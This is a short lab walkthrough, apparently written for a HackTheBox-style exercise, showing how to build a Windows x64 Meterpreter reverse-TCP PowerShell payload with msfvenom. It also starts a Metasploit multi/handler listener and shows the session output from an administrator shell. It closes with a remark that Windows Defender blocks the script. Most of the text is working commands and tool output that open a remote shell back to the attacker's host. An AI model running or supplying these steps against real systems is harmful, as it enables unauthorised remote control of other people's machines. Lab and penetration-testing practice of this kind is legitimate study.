1 Create Shell
root@kali:~/htb# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.16 LPORT=443 -f psh -o meterpreter-64.ps1 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Final size of psh file: 3255 bytes Saved as: meterpreter-64.ps1
2 Setup listener
msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.178.16; set lport 443; set ExitOnSession false; exploit -j"
3. Interact
# cowsay++ ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v4.17.25-dev ] + -- --=[ 1828 exploits - 1033 auxiliary - 318 post ] + -- --=[ 541 payloads - 44 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] payload => windows/x64/meterpreter/reverse_tcp lhost => 192.168.178.16 lport => 443 ExitOnSession => false [*] Exploit running as background job 0. [*] Started reverse TCP handler on 192.168.178.16:443 msf exploit(multi/handler) > [*] Sending stage (206403 bytes) to 192.168.178.10 [*] Meterpreter session 1 opened (192.168.178.16:443 -> 192.168.178.10:53418) at 2018-11-21 14:27:09 -0500 msf exploit(multi/handler) > sessions -l Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows HTB\administrator @ PUCKIE 192.168.178.16:443 -> 192.168.178.10:53418 (192.168.178.10)
4. if Windows Defender is enabled
PS C:\PENTEST> C:\PENTEST\meterpreter-64.ps1 At C:\PENTEST\meterpreter-64.ps1:1 char:1 + $VlSIhDyrsor = @" + ~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ScriptContainedMaliciousContent PS C:\PENTEST>
5. Summary: The the generated ps1 can be saved to disk, and is not detected as a virus , and runs succesfull creating a shell, but it can’t run with defender enabled on my windows 10 box.
(c)2018 Jacco Straathof